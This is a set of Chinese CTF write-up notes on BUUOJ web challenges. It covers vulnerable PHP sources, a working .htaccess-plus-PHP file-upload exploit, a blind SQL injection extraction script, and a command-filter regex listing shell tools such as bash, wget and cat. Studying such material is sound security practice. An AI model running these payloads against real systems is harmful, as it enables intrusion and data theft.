文章目录
[De1CTF 2019]SSRF Me
[安洵杯 2019]easy_web
首先打开网页,看到url有个cmd就以为是rce,然后看到提示
连续解码两次获得一个md5数字,以为是md5,还是我太菜了,结果是十六进制数字
index.php生成参数TmprMlpUWTBOalUzT0RKbE56QTJPRGN3,得到的结果解码
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
然后a和b不可以用hackbar因为hackbar默认要编码一次,所以burp
[GXYCTF2019]BabyUpload
import requests
url = "http://a49eadda-16e3-4db7-8d9c-6bc1aa62bca8.node3.buuoj.cn"
session = requests.session()
htaccess = {
'uploaded': ('.htaccess', "AddType application/x-httpd-php .jpg", 'image/jpeg')}
r1 = session.post(url, files=htaccess)
files2 = {
'uploaded': ('6.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res = session.post(url, files=files2)
print(res.text)
然后访问得到flag
[BJDCTF2020]Mark loves cat
网页打开是一堆没用的果然是git源码泄露
buu的docker环境出错把我搞了一下,现在好了
这是关键代码
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
我有一个数据库
太简单了CVE-2018-12613
[BJDCTF2020]The mystery of ip
前面没保存懒得写上去
啥都没发现。看看wp去
smarty模板注入
[BJDCTF2020]ZJCTF,不过如此
代码审计
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
本地文件包含配合php伪协议的使用
preg_replace() /e模式命令执行
[GKCTF2020]CheckIN
[GYCTF2020]Ezsqli
import requests
url = "http://5a3ceadf-9981-4fb8-a8c0-5a04a4d8fbf1.node3.buuoj.cn/index.php"
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = "0^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i, mid)
payload = "0^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})".format(i, mid)
data = {
"id":payload
}
r = requests.post(url,data=data)
r.encoding = "utf-8"
# print(url+payload)
if "Nu1L" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)